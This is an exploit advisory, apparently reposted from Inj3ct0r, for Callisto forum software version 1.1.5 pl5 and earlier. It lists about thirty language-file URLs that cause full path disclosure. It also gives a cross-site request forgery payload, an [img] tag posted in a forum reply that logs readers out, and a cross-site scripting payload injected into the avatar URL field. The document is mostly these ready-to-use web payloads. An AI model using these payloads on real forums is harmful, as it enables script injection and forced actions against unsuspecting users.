Home / os / win7

Callisto <= 1.1.5 pl5 (FPD/XSS/XSRF) Multiple Vulnerabili

Posted on 20 April 2010

===========================================================
Callisto <= 1.1.5 pl5 (FPD/XSS/XSRF) Multiple Vulnerability
===========================================================

################################################################################
# Exploit Title:         Callisto <= 1.1.5 pl5 (FPD/XSS/XSRF) Multiple Vulnerability
#
# Software               Callisto 1.1.5 pl5
# Date:                  2010-04-20
# Author:                GLOBUS
# Software Link:         http://www.unisolutions.pl
# Version:               <= 1.1.5 pl5
# category:              FPD, XSS, XSRF
#
# Greetz:                hds, Neo, pok3, .xXx., j4ck, revel004
################################################################################

[FPD]
http://[FORUM_URL]/languages/pl/acp.php
http://[FORUM_URL]/languages/pl/acp_sections.php
http://[FORUM_URL]/languages/pl/acp_section_admin.php
http://[FORUM_URL]/languages/pl/acp_section_forums.php
http://[FORUM_URL]/languages/pl/acp_section_look.php
http://[FORUM_URL]/languages/pl/acp_section_settings.php
http://[FORUM_URL]/languages/pl/acp_section_users.php
http://[FORUM_URL]/languages/pl/action_login.php
http://[FORUM_URL]/languages/pl/action_mail_user.php
http://[FORUM_URL]/languages/pl/action_mark_read.php
http://[FORUM_URL]/languages/pl/action_online.php
http://[FORUM_URL]/languages/pl/action_register.php
http://[FORUM_URL]/languages/pl/action_reset_pass.php
http://[FORUM_URL]/languages/pl/action_search.php
http://[FORUM_URL]/languages/pl/action_team.php
http://[FORUM_URL]/languages/pl/action_user_cp.php
http://[FORUM_URL]/languages/pl/bb_tags.php
http://[FORUM_URL]/languages/pl/calendar.php
http://[FORUM_URL]/languages/pl/common.php
http://[FORUM_URL]/languages/pl/errors.php
http://[FORUM_URL]/languages/pl/forums.php
http://[FORUM_URL]/languages/pl/help.php
http://[FORUM_URL]/languages/pl/logs.php
http://[FORUM_URL]/languages/pl/main.php
http://[FORUM_URL]/languages/pl/messages.php
http://[FORUM_URL]/languages/pl/moderating.php
http://[FORUM_URL]/languages/pl/report_post.php
http://[FORUM_URL]/languages/pl/rss.php
http://[FORUM_URL]/languages/pl/spam_bots_protection.php
http://[FORUM_URL]/languages/pl/time.php
http://[FORUM_URL]/languages/pl/topics.php
http://[FORUM_URL]/languages/pl/users.php


[XSRF]
Post reply:
[img]http://[FORUM_URL]/?act=login&do=logout[/img]


[XSS]
Go to "Twój profil" -> "Zmieñ swój avatar" -> "Linkuj avatar z zewnêtrznego servera:"

http://[PATH_TO_IMAGE]?"><script>alert(1024)</script><a.jpg


# Inj3ct0r.com [2010-04-20]

 

TOP

Malware :

Exploits :